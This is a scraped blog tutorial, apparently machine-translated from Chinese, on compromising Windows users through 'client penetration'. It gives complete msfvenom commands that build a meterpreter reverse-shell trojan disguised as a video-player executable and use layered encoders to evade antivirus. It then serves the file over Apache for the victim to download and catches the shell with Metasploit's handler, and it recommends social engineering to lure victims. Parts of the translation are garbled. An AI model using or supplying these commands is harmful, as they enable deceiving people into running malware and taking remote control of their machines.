Penetration based on Windows client

Enterprise 2023-07-12 03:29:53 views: null

Penetration based on Windows client

Principle of Client Penetration

When we cannot break through the network boundary of the other party, we often need to use client penetration to attack the target. For example, we send a program containing a backdoor to the target, or a word document or pdf file. In order to achieve the effect, it is also necessary to make good use of social engineering to lure victims to execute malicious programs.

Since there is anti-virus software, we can use color websites or avoid killing to avoid killing.

Avoid killing can be done by modifying binary characteristic characters or encrypting.

combat

Making Windows Malware Get a Shell

msfvenom is a combination of msfpayload and msfencode, which can generate a Trojan horse program by using msfvenom, execute it on the target machine, and monitor it locally .

Generate xx video.exe backdoor program

use an encoder

Command: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html /xx video1.exe

img

Use two encoders to further enhance avoidance capabilities

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/xx影音2.exe

img

Parameter Description

-a specifies the architecture, such as: x86 and x64, x86 represents 32 bits, and x64 represents 64 bits.

–platform specifies the platform, choose windows here, you can view all supported platforms through –l platforms

-p set attack payload

-b remove bad characters, bad characters will affect the normal execution of payload

start apache2

Instruction: systemctl start apache2

Go to the target machine to browse, click download to open

Order:

img

Go back to kali and start monitoring

Command: msf

Enter the multi/handler module

img

set payload

命令:set payload windows/meterpreter/reverse_http

img

Set the shell used to accept bounces from the target machine

img

start attacking

command: run

ell

[External link image transfer...(img-XISI9keB-1674722619984)]

start attacking

command: run

img

Guess you like

Origin blog.csdn.net/qq_62803993/article/details/128766228
Recommended
微软回应中国区AI团队“打包赴美”传闻
Ranking
How to use ChatGPT to write 100,000+ hot articles for public accounts (includes prompt words)
sudo echo command execution Permission denied
ADO: Using Transactions to Operate Oracle Database
[Java] [Class and Object] equals, hashCode, clone methods
Linux virtual host function
Порт управления rabbitmq открыт
on,where
jQuery WeUI
How can there be a weed pilot in Hangzhou?
tcp / ip model four
Daily
More
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)

Code World

© 2018 codetd.com